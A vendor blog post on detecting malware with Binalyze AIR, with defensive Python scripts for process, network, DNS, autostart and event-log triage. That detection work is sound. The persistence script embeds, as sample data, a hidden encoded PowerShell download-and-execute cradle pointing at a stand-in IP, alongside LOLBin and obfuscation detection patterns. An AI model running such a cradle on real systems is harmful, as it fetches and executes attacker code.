Binalyze AIR in Action: Detect malware on a potentially infected system
Tim Thorne : Wed, Jan 15, '25
Detecting malware on a potentially infected system requires more than just waiting for alerts—it demands an investigative mindset. Proactive threat hunting and forensic analysis are crucial for uncovering hidden threats that may evade conventional detection. Binalyze AIR empowers teams with the tools to not only respond to known threats but also proactively investigate suspicious activity. By combining automation and deep forensic capabilities with integrated threat detection techniques, AIR transforms investigations into opportunities for uncovering compromises early, reducing risks, and staying ahead of attackers.
Core Four Investigative Priorities
As an investigation moves from exploring evidence to answering critical questions, the focus narrows to the Core Four investigative priorities that guide most IR investigations:
- How did the attacker get in? Identifying the entry point helps uncover vulnerabilities and methods of compromise, allowing teams to close the breach and prevent recurrence.
- Are they still here? Determining the attacker’s current presence is vital for containment and ensures the environment is secure.
- Which systems and user accounts are affected? Mapping the scope of the attack, including impacted assets and accounts, helps prioritize response actions and reduces further risk.
- Was any data stolen? Understanding the extent of data exfiltration informs incident reporting, compliance, and mitigation strategies.
Binalyze AIR is designed to help investigators answer these questions quickly and thoroughly, turning forensic evidence and automated analysis into actionable findings. Below, we outline eight investigation strategies supported by AIR that give teams actionable insight and reduce investigation times by 50-70%.
1. Identify and Analyze Suspicious Processes
Key Question: Are they still here?
Start by examining running processes on the potentially infected system. With AIR’s Process Analyzer, one of over 20 analyzers in DRONE, you can identify unusual processes that stand out due to high resource usage or atypical behavior. Complement this analysis with:
- YARA and Sigma scans: YARA rules match byte and string patterns in files and memory, so rules tailored to the malware’s characteristics find its components on disk and in RAM; Sigma rules match log events, so they detect behaviours such as unusual process creation and privilege escalation (for example, process-creation events from Sysmon or Security Event ID 4688). Matching content and behaviour together makes it much harder for even advanced threats to go unnoticed.
But how do you know which assets to prioritize in your investigation?
This is where AIR Auto Asset Tagging shines. By automatically categorizing your assets based on characteristics like device type, user, or criticality, you can focus your efforts on high-value or high-risk assets. For example, if an unusual process appears on a system tagged as a high-priority server, you can escalate your response with confidence and precision.
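The process checks described above can be expressed as a small triage script run over a process listing such as the CSV exports AIR collects. The following is an added example written for this page, not Binalyze or DRONE code; the process table, host, users and paths in it are constructed, and the rule sets (document applications that should not spawn shells, system binary names that belong only in System32, user-writable paths, the CPU threshold) are assumptions to tune per environment:

```python
"""Flag suspicious processes in a process listing (added example, not Binalyze code)."""
import csv
import io

# Parents that should not normally spawn command interpreters or LOLBins (assumed set).
DOC_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
            "chrome.exe", "msedge.exe", "firefox.exe", "acrord32.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Names attackers copy to blend in; the legitimate copies live only under these dirs.
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "smss.exe",
                   "services.exe", "winlogon.exe", "wininit.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")
HIGH_CPU = 80.0  # percent; weak on its own, useful combined with the other rules

# Constructed sample listing (hypothetical host, users and paths), shaped like a
# pid/ppid/name/path/user/cpu export of the running processes.
SAMPLE_CSV = r"""pid,ppid,name,path,user,cpu_pct
4,0,System,,NT AUTHORITY\SYSTEM,0.5
612,4,smss.exe,C:\Windows\System32\smss.exe,NT AUTHORITY\SYSTEM,0.0
900,700,svchost.exe,C:\Windows\System32\svchost.exe,NT AUTHORITY\SYSTEM,1.2
2880,2600,explorer.exe,C:\Windows\explorer.exe,CORP\jdoe,1.0
3104,2880,WINWORD.EXE,C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE,CORP\jdoe,3.0
3388,3104,cmd.exe,C:\Windows\System32\cmd.exe,CORP\jdoe,0.1
3412,3388,powershell.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,CORP\jdoe,85.0
4120,900,svchost.exe,C:\Users\jdoe\AppData\Local\Temp\svchost.exe,CORP\jdoe,2.0
"""


def load_processes(text):
    """Parse the CSV into {pid: {...}} with names and paths lower-cased for matching."""
    procs = {}
    for row in csv.DictReader(io.StringIO(text)):
        procs[int(row["pid"])] = {
            "ppid": int(row["ppid"]),
            "name": row["name"].lower(),
            "path": row["path"].lower(),
            "user": row["user"],
            "cpu": float(row["cpu_pct"]),
        }
    return procs


def ancestors(procs, pid):
    """Yield ancestor process names, nearest first; stops at unknown pids or cycles.
    Caveat: Windows reuses PIDs, so a snapshot can show a stale parent."""
    seen = set()
    ppid = procs[pid]["ppid"]
    while ppid in procs and ppid not in seen:
        seen.add(ppid)
        yield procs[ppid]["name"]
        ppid = procs[ppid]["ppid"]


def find_suspicious(procs):
    """Return {pid: [reasons]} for every process that trips at least one rule."""
    findings = {}
    for pid, p in procs.items():
        reasons = []
        if p["name"] in SHELLS and any(a in DOC_APPS for a in ancestors(procs, pid)):
            reasons.append("shell/LOLBin descended from a document or browser process")
        if p["name"] in SYSTEM_BINARIES and p["path"] and not p["path"].startswith(SYSTEM_DIRS):
            reasons.append("system binary name running outside System32/SysWOW64")
        if any(m in p["path"] for m in USER_WRITABLE):
            reasons.append("executing from a user-writable directory")
        if p["cpu"] >= HIGH_CPU:
            reasons.append("high CPU usage (%.0f%%)" % p["cpu"])
        if reasons:
            findings[pid] = reasons
    return findings


if __name__ == "__main__":
    procs = load_processes(SAMPLE_CSV)
    for pid, reasons in sorted(find_suspicious(procs).items()):
        chain = " <- ".join([procs[pid]["name"]] + list(ancestors(procs, pid)))
        print(f"pid {pid}: {chain}")
        for r in reasons:
            print("   -", r)
```

Each finding is printed with its ancestry chain, so the analyst sees WINWORD.EXE spawning cmd.exe spawning powershell.exe rather than three isolated processes. The chain is rebuilt from parent PIDs in one snapshot, and a reused PID can produce a misleading parent, so treat a surprising ancestor as a lead to confirm against process-creation events rather than as proof.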
2. Memory and Disk Forensics
Key Question: Was any data stolen?
Malware often resides in memory or hides on disk. AIR supports both lines of investigation:
- Scanning and dumping live memory: capture live memory from the asset with an AIR acquisition profile or through interACT, then scan the dump with YARA rules (applied by AIR’s MITRE ATT&CK Analyzer) to find malware signatures and code fragments. Acquire memory before other collections: it is the most volatile evidence and is lost on reboot.
- Full disk image analysis: with AIR’s File Explorer, look for obfuscated filenames, hidden files and unusual directories. Malware often nests in hard-to-spot locations, and AIR helps surface these traces.
3. Network Connections and Command & Control (C2) Detection
Key Question: How did they get in?
Understanding how malware communicates is crucial. AIR provides tools to track network activity:
- Collect network traffic and active connections: identify anomalous connections to suspicious external IPs or non-standard ports. AIR collects TCP and UDP connection tables and stores them as CSV, and can capture IP packets as PCAP.
- DNS analysis: look for frequent or randomized domain queries, and for bursts of NXDOMAIN responses, which may indicate a Domain Generation Algorithm (DGA) in use by the malware.
These insights can reveal the initial access vector or an active connection to a Command & Control (C2) server.
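Two of these checks, external peers on unexpected ports from the TCP connection table and DGA-looking names from DNS queries, as an added example written for this page (not Binalyze code). The connection table and DNS log are constructed, the remote addresses use RFC 5737 documentation ranges, and the expected-port allowlist, the internal network list and the scoring thresholds are assumptions to tune:

```python
"""Flag unusual outbound connections and DGA-like DNS queries (added example, not Binalyze code)."""
import csv
import io
import ipaddress
import math
from collections import Counter, defaultdict

# Anything outside these ranges is treated as external. Listed explicitly rather than
# using ipaddress's is_global, which would also classify documentation ranges as non-global.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]
# Ports a workstation is expected to reach on the Internet (assumed; tune per environment).
EXPECTED_PORTS = {22, 25, 53, 80, 443, 587, 993}
DGA_THRESHOLD = 3  # of 4 traits

# Constructed samples: a connection-table CSV and a DNS query log for a hypothetical host.
CONNECTIONS_CSV = """local_addr,local_port,remote_addr,remote_port,state,pid,process
10.0.0.5,52114,203.0.113.10,443,ESTABLISHED,3000,msedge.exe
10.0.0.5,52120,203.0.113.77,4444,ESTABLISHED,3412,powershell.exe
10.0.0.5,52130,198.51.100.9,443,ESTABLISHED,4120,svchost.exe
10.0.0.5,445,10.0.0.23,50112,ESTABLISHED,4,System
"""
DNS_LOG = """client,query
10.0.0.5,www.microsoft.com
10.0.0.5,login.microsoftonline.com
10.0.0.5,xk3q9vz1h8tpw2.net
10.0.0.5,qwpdjsklfjhgtrv.biz
10.0.0.5,a1b2c3d4e5f6g7.com
10.0.0.9,update.googleapis.com
"""


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def unusual_connections(text):
    """Return (process, remote_addr, remote_port) for external peers on unexpected ports."""
    hits = []
    for row in csv.DictReader(io.StringIO(text)):
        port = int(row["remote_port"])
        if not is_internal(row["remote_addr"]) and port not in EXPECTED_PORTS:
            hits.append((row["process"], row["remote_addr"], port))
    return hits


def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def dga_score(fqdn):
    """Score the registrable label 0..4 on DGA-like traits: long, high-entropy,
    vowel-poor, digit-heavy. Simplification: uses the second-to-last label; a
    public-suffix list is needed to handle names such as example.co.uk correctly."""
    labels = fqdn.lower().rstrip(".").split(".")
    label = labels[-2] if len(labels) >= 2 else labels[0]
    n = len(label)
    vowel_ratio = sum(ch in "aeiou" for ch in label) / n
    digit_ratio = sum(ch.isdigit() for ch in label) / n
    return (int(n >= 12) + int(shannon_entropy(label) >= 3.5)
            + int(vowel_ratio < 0.25) + int(digit_ratio > 0.2))


def dga_suspects(text):
    """Group DGA-like queries by client; several per client is the stronger signal."""
    by_client = defaultdict(list)
    for row in csv.DictReader(io.StringIO(text)):
        if dga_score(row["query"]) >= DGA_THRESHOLD:
            by_client[row["client"]].append(row["query"])
    return dict(by_client)


if __name__ == "__main__":
    for proc, addr, port in unusual_connections(CONNECTIONS_CSV):
        print(f"{proc} -> {addr}:{port} (external peer on unexpected port)")
    for client, names in dga_suspects(DNS_LOG).items():
        print(f"{client}: {len(names)} DGA-like queries: {', '.join(names)}")
```

Note what the port rule does not catch: the svchost.exe connection to 198.51.100.9 on 443 passes because 443 is expected, which is exactly why C2 traffic so often uses it. The DNS check is a heuristic: it scores the second-to-last label, so a random-looking subdomain under a CDN name is not scored, and a name under a two-part public suffix is scored on the wrong label. Pairing a flagged client with the process and persistence findings on the same host is what turns a heuristic hit into a lead.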
4. Investigate Persistence Mechanisms
Key Question: Are they still here?
Malware strives to maintain persistence. Using AIR, you can uncover these mechanisms:
- Persistence artifact detection: search registry autostart locations such as the Run keys, unauthorized scheduled tasks, services and startup folder changes.
- Scheduled tasks and registry analysis: AIR’s Investigation Hub lets you pinpoint the malicious registry keys, tasks or unauthorized services that keep the malware running across reboots.
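A triage pass over the autostart entries these searches return, as an added example written for this page (not Binalyze code). The entries are constructed, the URL inside the encoded command is a documentation address, and the LOLBin list, path markers and weights are assumptions. The point it shows is that decoding the -EncodedCommand payload and combining several weak signals is what separates the malicious Run key from the legitimate OneDrive entry that also runs from AppData:

```python
"""Triage autostart entries for persistence (added example, not Binalyze code)."""
import base64
import re

LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
SYSTEM_ACCOUNTS = {"system", "localsystem", "nt authority\\system"}
HIDDEN_FLAGS = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|noni(?:nteractive)?)", re.I)
# -e / -ec / -en / -enc / -encodedcommand followed by base64. PowerShell also accepts
# other unambiguous prefixes of -EncodedCommand; extend the alternation as needed.
ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
FLAG_THRESHOLD = 2

# The payload an attacker would hide behind -enc (hypothetical URL); PowerShell expects
# base64 of the UTF-16LE command, so the sample is built the same way.
HIDDEN_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.77/a')"
ENCODED_PAYLOAD = base64.b64encode(HIDDEN_PAYLOAD.encode("utf-16le")).decode()

# Constructed autostart entries (hypothetical names and paths) of the kind collected
# from Run keys, scheduled tasks and services.
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
AUTORUNS = [
    {"source": RUN_KEY.replace("HKCU", "HKLM"), "name": "SecurityHealth", "run_as": "jdoe",
     "command": r"%windir%\system32\SecurityHealthSystray.exe"},
    {"source": RUN_KEY, "name": "OneDrive", "run_as": "jdoe",
     "command": r'"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"source": RUN_KEY, "name": "Updater", "run_as": "jdoe",
     "command": f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"},
    {"source": "Scheduled task", "name": r"\Microsoft\Windows\Maint\Cleanup", "run_as": "SYSTEM",
     "command": r"C:\Users\Public\Libraries\svc.exe -s"},
    {"source": RUN_KEY, "name": "Intel", "run_as": "jdoe",
     "command": r"rundll32.exe C:\Users\jdoe\AppData\Roaming\x.dll,Start"},
]


def decode_encoded_command(command):
    """Return the plaintext behind -EncodedCommand (UTF-16LE base64), or None."""
    m = ENCODED.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def first_token(command):
    """Executable name of the command line, handling a quoted path."""
    cmd = command.strip()
    exe = cmd[1:cmd.index('"', 1)] if cmd.startswith('"') else cmd.split()[0]
    return exe.replace("/", "\\").split("\\")[-1].lower()


def assess(entries):
    """Return {name: {score, reasons, decoded}} for entries scoring >= FLAG_THRESHOLD."""
    findings = {}
    for e in entries:
        cmd, low = e["command"], e["command"].lower()
        decoded = decode_encoded_command(cmd)
        in_user_dir = any(m in low for m in USER_WRITABLE)
        checks = [  # (weight, reason, hit)
            (1, "launched through a LOLBin", first_token(cmd) in LOLBINS),
            (1, "hidden-window / no-profile flags", bool(HIDDEN_FLAGS.search(cmd))),
            (2, "encoded PowerShell command", decoded is not None),
            (1, "binary in a user-writable directory", in_user_dir),
            (1, "runs as SYSTEM from a user-writable path",
             in_user_dir and e["run_as"].lower() in SYSTEM_ACCOUNTS),
            (1, "references a URL", "http" in low or bool(decoded and "http" in decoded.lower())),
        ]
        score = sum(w for w, _, hit in checks if hit)
        if score >= FLAG_THRESHOLD:
            findings[e["name"]] = {"score": score, "decoded": decoded,
                                   "reasons": [why for _, why, hit in checks if hit]}
    return findings


if __name__ == "__main__":
    for name, f in assess(AUTORUNS).items():
        print(f"[{f['score']}] {name}: {', '.join(f['reasons'])}")
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

OneDrive scores only one point (it lives under AppData) and is not flagged; Updater scores five and prints the decoded download cradle; the SYSTEM scheduled task running a binary from Users\Public and the rundll32 entry loading a DLL from AppData\Roaming each reach the threshold on two weak signals. A single weak signal is not worth an alert, which is what the threshold encodes; confirm a borderline entry by checking the binary's signature and hash rather than raising the weights.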
5. Event Log Analysis for Malicious Activity
Key Question: Which systems and user accounts are affected?
Malware activities often leave traces in system logs. AIR’s Investigation Hub helps streamline and consolidate this analysis:
- Event ID tracking: focus on Event IDs tied to lateral movement, RDP sessions or privilege escalation (for example, Security Event ID 4624 with logon type 10 for inbound RDP sessions, 4672 for logons granted special privileges, and Event ID 1029 in the TerminalServices-RDPClient Operational log for outbound RDP connections from the host).
- Automated log filtering: filter out noise to zero in on suspicious events such as failed logons or unauthorized access attempts.
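Scoping affected hosts and accounts from these events, as an added example written for this page (not Binalyze code). It runs over constructed Security and System log records with shortened field names; the failure threshold, the logon types treated as remote and the user-writable path markers are assumptions:

```python
"""Correlate Windows logon and service events to scope an incident (added example, not Binalyze code)."""
from collections import Counter

FAIL_THRESHOLD = 3            # 4625 failures before a 4624 success that we treat as suspicious
REMOTE_LOGON_TYPES = {3, 10}  # network (SMB, WinRM, ...) and RemoteInteractive (RDP)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def ev(time, host, eid, **fields):
    return {"time": time, "host": host, "id": eid, **fields}


# Constructed events (hypothetical hosts, accounts and addresses). Field names are
# shortened from the EVTX ones: account = TargetUserName, src_ip = IpAddress,
# logon_type = LogonType; 7045 (System log) carries ServiceName and ImagePath.
SVC = r"CORP\svc_backup"
EVENTS = [
    *[ev(f"2025-01-10T09:00:0{i}", "WS01", 4625, account=SVC, logon_type=3, src_ip="10.0.0.9")
      for i in range(5)],
    ev("2025-01-10T09:00:09", "WS01", 4624, account=SVC, logon_type=3, src_ip="10.0.0.9"),
    ev("2025-01-10T09:00:09", "WS01", 4672, account=SVC),
    ev("2025-01-10T09:14:30", "SRV02", 4624, account=SVC, logon_type=10, src_ip="10.0.0.5"),
    ev("2025-01-10T09:15:02", "SRV02", 7045, service="WinUpdSvc",
       image_path=r"C:\Users\Public\svc.exe"),
    ev("2025-01-10T09:20:00", "WS03", 4624, account=r"CORP\jdoe", logon_type=2, src_ip="-"),
]


def scope_incident(events, fail_threshold=FAIL_THRESHOLD):
    """Walk events in time order and return the accounts, hosts and edges implicated."""
    failures = Counter()   # (host, account) -> failed logons seen so far
    compromised = set()    # accounts that succeeded after repeated failures
    lateral = []           # (src_ip, host, logon_type): remote logons by those accounts
    privileged = set()     # (host, account) where a compromised account got special privileges
    persistence = []       # (host, service, image_path): services installed from user-writable paths
    hosts = set()
    for e in sorted(events, key=lambda x: x["time"]):
        eid, key = e["id"], (e["host"], e.get("account"))
        if eid == 4625:
            failures[key] += 1
        elif eid == 4624:
            if failures[key] >= fail_threshold:
                compromised.add(e["account"])
            if e["account"] in compromised and e["logon_type"] in REMOTE_LOGON_TYPES:
                lateral.append((e["src_ip"], e["host"], e["logon_type"]))
                hosts.add(e["host"])
        elif eid == 4672 and e["account"] in compromised:
            privileged.add(key)
        elif eid == 7045 and any(m in e["image_path"].lower() for m in USER_WRITABLE):
            persistence.append((e["host"], e["service"], e["image_path"]))
            hosts.add(e["host"])
    return {"accounts": compromised, "hosts": hosts, "lateral": lateral,
            "privileged": privileged, "persistence": persistence}


if __name__ == "__main__":
    result = scope_incident(EVENTS)
    print("affected accounts:", sorted(result["accounts"]))
    print("affected hosts:   ", sorted(result["hosts"]))
    for src, host, ltype in result["lateral"]:
        print(f"lateral movement: {src} -> {host} (logon type {ltype})")
    for host, svc, path in result["persistence"]:
        print(f"persistence: service {svc} on {host} from {path}")
```

The chain the sample encodes is repeated 4625 failures, a 4624 success for the same account, a 4672 privileged logon, then a type-10 RDP logon with that account on a second host and a 7045 service installed there from a user-writable path; the unrelated interactive logon on WS03 is left alone. Logon events are written on the host that was logged on to, so this needs logs from every host in scope, and Kerberos authentication recorded only at the domain controller (4768, 4771) is not covered by these IDs.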
6. Analyze Suspicious Files and Indicators of Compromise (IoCs)
Key Question: Was any data stolen?
Suspicious files are often the linchpin in malware investigations. AIR provides multiple ways to analyze these artifacts:
- interACT (AIR’s remote shell) for file analysis: collect suspicious files and submit them to VirusTotal or a sandbox for deeper inspection. Look up the file’s hash on VirusTotal before uploading the file itself: uploaded samples are shared with other subscribers, which can tip off an attacker watching for their sample or expose sensitive data embedded in a targeted one.
- DRONE’s IoC detection: automatically scan collected artifacts for known IoCs, leveraging updated threat intelligence to detect malicious activity.
7. Leverage MITRE ATT&CK TTP Mapping
Key Question: How did they get in?
Understanding attacker tactics is essential for effective response. AIR integrates MITRE ATT&CK to map malware behaviors to specific Tactics, Techniques, and Procedures (TTPs) to enable quick and easy visualization. This includes:
- Lateral movement: trace how attackers move across the network.
- Persistence and privilege escalation: detect the methods used to maintain and expand access.
8. Automate Ongoing Compromise Assessments and Reporting
Key Question: Are they still here?
Prevention and early detection are as critical as remediation. AIR’s automation capabilities ensure constant vigilance:
- Automated detection rules: schedule scans for key IoCs and suspicious behaviours that EDRs might miss. EDRs excel at real-time detection, but their reliance on alerts and predefined rules can leave deeper or stealthier threats undetected. AIR complements them by collecting over 650 evidence types and supporting full forensic investigation with tools such as timeline analysis and YARA scanning. It integrates with SIEM and SOAR platforms, automates workflows, and gives forensic visibility across on-premises assets, cloud environments and air-gapped systems.
- Seamless integration: pair AIR with your existing EDR/XDR to trigger forensic collection and analysis automatically after an alert.
- Comprehensive reports: use AIR’s reporting tools to document findings for immediate action and future resilience.
Conclusion
By addressing the Core Four questions—how attackers got in, whether they’re still active, the scope of the compromise, and the extent of the damage—Binalyze AIR enables investigators to approach security incidents with confidence and speed. From in-depth forensic-level investigations to automated threat hunting, AIR simplifies the investigative process while ensuring no detail is overlooked.
Stay proactive. Equip your team with solutions like Binalyze AIR to turn all security investigations into opportunities for strengthening defenses and building cyber resilience.
Book a demo today and see how you can answer the Core Four questions in record time.
Check out this blog to see how effortlessly AIR's Investigation Hub simplifies handling malware cases.